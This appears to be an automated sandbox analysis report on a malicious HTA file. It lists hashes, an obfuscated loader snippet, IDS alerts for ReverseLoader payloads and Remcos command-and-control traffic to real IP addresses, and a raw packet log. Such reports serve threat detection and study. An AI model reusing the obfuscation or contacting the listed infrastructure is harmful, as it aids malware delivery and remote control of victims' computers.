                                                                          SSDEEP:3072:1VUeFHOtbqwAQvoa4yLdbVUeFHOtbqwAQvoa4yLBVUeFHOtbqwAQvoa4yLM:nH6TA1SdpH6TA1SrH6TA1SM
                                                                          MD5:8BA4E1DCC487BD110B4BCD41E7EE2BA5
                                                                          SHA1:1881AFFF1EB946FDB3EE62133CA43D0BC136AC37
                                                                          SHA-256:4BCB2F9B3A929BD940484218EF0A8C03842480A15BD8A3C4521F5097BD89D581
                                                                          SHA-512:006B7DCFDB7EE27CA1E6AA536C2399321966FFC3B82BC0F86470614345B6E0A2A1ED1D7A143C500669FBA375F9706CFF8ED421502DF7F12F49C3260DC5A8BDE4
                                                                          Malicious:true
                                                                          Preview:..........L.W.u.x.i.o.b.i.P.G.x.U.r.j.Q. .=. .".G.a.k.i.G.l.i.Z.H.e.f.k.i.z.o.".....c.R.G.K.s.P.Z.i.Z.W.k.L.k.n.h. .=. .".e.A.L.L.e.L.R.W.N.f.B.n.W.P.L.".....f.A.z.e.t.L.e.U.G.N.N.R.A.m.k. .=. .".t.N.J.P.i.Q.a.c.S.h.e.j.N.p.d.".....L.f.i.U.W.j.K.C.f.C.c.k.q.x.b. .=. .".N.d.Z.k.K.z.L.d.P.Z.I.L.U.a.o.".....h.L.L.L.W.L.L.O.N.i.K.f.t.A.u. .=. .".d.i.o.L.N.i.l.R.K.L.v.x.i.R.n.".....B.k.k.G.c.k.k.c.H.R.d.a.h.p.r. .=. .".Z.P.N.b.p.d.Z.i.L.Z.m.P.W.L.L.".........N.G.P.W.v.K.L.L.P.z.k.u.L.h.Z. .=. .".C.I.K.W.a.W.W.L.f.G.h.Z.K.L.h.".....c.U.W.x.W.U.W.o.P.c.Z.L.t.C.h. .=. .".c.p.x.e.B.t.f.f.P.z.G.b.m.L.G.".....c.B.W.O.u.i.G.K.W.u.m.u.K.G.c. .=. .".m.h.L.W.G.W.l.o.c.L.W.k.W.O.h.".........d.l.G.K.b.i.c.B.c.b.h.m.k.K.u. .=. .".K.m.e.c.m.i.W.x.s.R.Q.H.k.L.L.".....p.e.N.N.Z.i.H.i.U.p.B.l.x.e.z. .=. .".q.b.q.x.h.i.P.n.K.K.L.W.G.i.b.".....R.b.B.e.W.p.j.B.H.i.K.c.x.P.z. .=. .".e.G.P.x.N.T.b.W.j.z.G.i.K.k.p.".....L.p.d.P.G.P.K.k.f.L.c.L.P.v.b. .=. .".e.n.z.A.W.P.L.U.o.p.u.G.i.a.c.".....G.m.z.c.f.G.I.e.K.Z.
                                                                          File type:HTML document, ASCII text, with very long lines (65536), with no line terminators
                                                                          Entropy (8bit):2.1926334528234275
                                                                          TrID:
                                                                            File name:sweetbabygivenbestthignsetnirelifegivenbackbestthignsalways.hta
                                                                            File size:614'246 bytes
                                                                            MD5:5a9dc05899d1a19be638824e5f47b88e
                                                                            SHA1:418e5c2cfc4ba40069bbcbc7373e9ff0b71740f2
                                                                            SHA256:741297ecc59d39296f360b100032cdb120af2eb4ccc5b91f370c0eacb9ee7e25
                                                                            SHA512:0772c9718b79ccff96ed8631ad22d117876c1cb5f1b9313494051e52a63b8f360d8f5fc81beaee296e120a873e99414818bb36db6bf795dfe99d54b3f47f4d7e
                                                                            SSDEEP:192:4dE6COljVneLyZXcFeLyZXcEeLyZXc/Czt4kQ:b6COljV+zO7
                                                                            TLSH:2CD403428C5F11AAB1DC9A9FFB7C542A2593D1EBAA4D1FAAD90FFDC0D8C2204F550C58
                                                                            File Content Preview:<script language=JavaScript>m='%3CScript%20Language%3D%27Javascript%27%3E%0A%3C%21--%20HTML%20Encryption%20provided%20by%20tufat.com%20--%3E%0A%3C%21--%0Adocument.write%28unescape%28%27%253C%2573%2563%2572%2569%2570%2574%2520%256C%2561%256E%2567%2575%2561
                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                            2024-11-26T09:44:13.870876+01002057635ET MALWARE Reverse Base64 Encoded MZ Header Payload Inbound1104.168.46.2680192.168.2.449738TCP
                                                                            2024-11-26T09:44:13.870876+01002858295ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain)1104.168.46.2680192.168.2.449738TCP
                                                                            2024-11-26T09:44:17.456994+01002858795ETPRO MALWARE ReverseLoader Payload Request (GET) M21192.168.2.449730104.168.46.2680TCP
                                                                            2024-11-26T09:44:29.901520+01002049038ET MALWARE ReverseLoader Reverse Base64 Loader In Image M21193.30.119.205443192.168.2.449731TCP
                                                                            2024-11-26T09:44:46.955074+01002020424ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M11104.168.46.2680192.168.2.449738TCP
                                                                            2024-11-26T09:44:46.955074+01002020425ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound M21104.168.46.2680192.168.2.449738TCP
                                                                            2024-11-26T09:44:58.938984+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449739192.169.69.2614645TCP
                                                                            2024-11-26T09:45:10.456136+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449740192.169.69.2614645TCP
                                                                            2024-11-26T09:45:22.004452+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449743192.169.69.2614645TCP
                                                                            2024-11-26T09:45:33.642369+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449769192.169.69.2614645TCP
                                                                            2024-11-26T09:45:45.143923+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449795192.169.69.2614645TCP
                                                                            2024-11-26T09:45:56.640094+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449821192.169.69.2614645TCP
                                                                            2024-11-26T09:46:08.570874+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449850192.169.69.2614645TCP
                                                                            2024-11-26T09:46:20.192797+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449876192.169.69.2614645TCP
                                                                            2024-11-26T09:46:31.772603+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449904192.169.69.2614645TCP
                                                                            2024-11-26T09:46:43.329673+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449929192.169.69.2614645TCP
                                                                            2024-11-26T09:46:54.967037+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449955192.169.69.2614645TCP
                                                                            2024-11-26T09:47:06.569998+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449980192.169.69.2614645TCP
                                                                            2024-11-26T09:47:18.496446+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450007192.169.69.2614645TCP
                                                                            2024-11-26T09:47:30.019357+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450018192.169.69.2614645TCP
                                                                            2024-11-26T09:47:41.573419+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450019192.169.69.2614645TCP
                                                                            2024-11-26T09:47:53.017292+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450020192.169.69.2614645TCP
                                                                            2024-11-26T09:48:04.494276+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450021192.169.69.2614645TCP
                                                                            2024-11-26T09:48:16.066157+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450022192.169.69.2614645TCP
                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Nov 26, 2024 09:44:16.166464090 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:16.286916018 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:16.287008047 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:16.287260056 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:16.409499884 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:17.456748962 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:17.456774950 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:17.456787109 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:17.456796885 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:17.456806898 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:17.456819057 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:17.456832886 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:17.456944942 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:17.456955910 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:17.456965923 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:17.456994057 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:17.456994057 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:17.456995010 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:17.457107067 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:17.577171087 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:17.577306032 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:17.577454090 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:17.577454090 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:17.658009052 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:17.658052921 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:17.658107996 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:17.658107996 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:17.662216902 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:17.662281036 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:17.662399054 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:17.662453890 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:17.672060013 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:17.672148943 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:17.672185898 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:17.672219992 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:17.679066896 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:17.679137945 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:17.679143906 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:17.679182053 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:17.687520027 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:17.687601089 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:17.687604904 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:17.687644958 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:17.695986986 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:17.696046114 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:17.696057081 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:17.696108103 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:17.704428911 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:17.704494953 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:17.704587936 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:17.704643011 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:17.712975025 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:17.713048935 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:17.713234901 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:17.713290930 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:17.721349001 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:17.721386909 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:17.721416950 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:17.721455097 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:17.729809046 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:17.729872942 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:17.729938030 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:17.730004072 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:17.738296986 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:17.738339901 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:17.738359928 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:17.738385916 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:17.859457016 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:17.859477997 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:17.859522104 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:17.859539032 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:17.864284992 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:17.864300013 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:17.864336967 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:17.864352942 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:17.869923115 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:17.869976044 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:17.870001078 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:17.870042086 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:17.878398895 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:17.878469944 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:17.878629923 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:17.878680944 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:17.886817932 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:17.886888027 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:17.886894941 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:17.886941910 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:17.895355940 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:17.895387888 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:17.895464897 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:17.895493984 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:17.903780937 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:17.903798103 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:17.903871059 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:17.903871059 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:17.912173033 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:17.912237883 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:17.912239075 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:17.912303925 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:17.920660019 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:17.920691013 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:17.920726061 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:17.920762062 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:17.926990032 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:17.927038908 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:17.927056074 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:17.927093029 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:17.933357000 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:17.933414936 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:17.933449984 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:17.933514118 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:17.939735889 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:17.939800024 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:17.939810038 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:17.939860106 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:17.946180105 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:17.946243048 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:17.946279049 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:17.946321011 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:17.952562094 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:17.952610016 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:17.952642918 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:17.952678919 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:17.958889961 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:17.958959103 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:17.959013939 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:17.959067106 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:17.965428114 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:17.965451002 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:17.965511084 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:17.965538025 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:18.060414076 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:18.060451984 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:18.060637951 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:18.060637951 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:18.063426018 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:18.063512087 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:18.063546896 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:18.063601971 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:18.069499969 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:18.069521904 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:18.069585085 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:18.075440884 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:18.075526953 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:18.075762033 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:18.081351042 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:18.081425905 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:18.081469059 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:18.081526041 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:18.087538958 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:18.087625027 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:18.087677956 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:18.087677956 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:18.092926025 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:18.093041897 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:18.093151093 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:18.098809958 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:18.098881006 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:18.098911047 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:18.098941088 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:18.104574919 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:18.104652882 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:18.104684114 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:18.104729891 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:18.110482931 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:18.110536098 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:18.110585928 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:18.110616922 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:18.116249084 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:18.116300106 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:18.116518021 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:18.116565943 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:18.121356964 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:18.121432066 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:18.121485949 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:18.121537924 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:18.126569033 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:18.126679897 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:18.126727104 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:18.126775980 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:18.131252050 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:18.131350994 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:18.131436110 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:18.136110067 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:18.136188030 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:18.136245012 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:18.136291981 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:18.141078949 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:18.141143084 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:18.141154051 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:18.141197920 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:18.146065950 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:18.146158934 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:18.146193027 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:18.146246910 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:18.151026964 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:18.151108027 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:18.151263952 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:18.151309967 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:18.156054974 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:18.156085968 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:18.156161070 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:18.160954952 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:18.161019087 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:18.161139011 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:18.161180973 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:18.166060925 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:18.166074991 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:18.166112900 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:18.166134119 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:18.170867920 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:18.170929909 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:18.170990944 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:18.171041012 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:18.175879955 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:18.175941944 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:18.175988913 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:18.176033020 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:18.180897951 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:18.180986881 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:18.181138039 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:18.181180954 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:18.185789108 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:18.185858011 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:18.185869932 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:18.185930014 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:18.190975904 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:18.190993071 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:18.191046953 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:18.261466980 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:18.261486053 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:18.261661053 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:18.262384892 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:18.262432098 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:18.262646914 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:18.262685061 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:18.266263008 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:18.266333103 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:18.266527891 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:18.266587019 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:18.270155907 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:18.270221949 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:18.270250082 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:18.270273924 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:18.273950100 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:18.274003983 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:18.274190903 CET8049730104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:18.274231911 CET4973080192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:18.278007030 CET8049730104.168.46.26192.168.2.4
